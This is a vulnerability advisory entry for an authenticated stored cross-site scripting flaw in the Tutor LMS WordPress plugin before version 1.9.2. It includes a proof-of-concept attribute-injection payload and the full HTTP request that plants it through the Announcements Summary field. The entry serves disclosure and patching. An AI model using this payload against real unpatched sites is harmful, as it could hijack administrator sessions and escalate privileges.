WordPress Plugin Vulnerabilities
Tutor LMS < 1.9.2 - Authenticated Stored Cross-Site Scripting (XSS)
Description
The plugin did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This lead to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.
Proof of Concept
As a Tutor Instructor, Create an Announcement and put the following payload in the Summary field: " style="animation-name:rotation" onanimationstart="alert(/XSS/)// POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 341 Connection: close Cookie: [Tutor Instructor+] _tutor_nonce=52e764441f&tutor_announcement_course=973&tutor_announcement_title=Test+Inst+XSS&tutor_announcement_summary=%22+style%3D%22animation-name%3Arotation%22+onanimationstart%3D%22alert(%2FXSS%2F)%2F%2F&action=tutor_announcement_create&action_type=create
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Phu Tran from techlabcorp.com
Submitter
Phu Tran
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-28 (about 2 years ago)
Added
2021-06-28 (about 2 years ago)
Last Updated
2021-08-10 (about 2 years ago)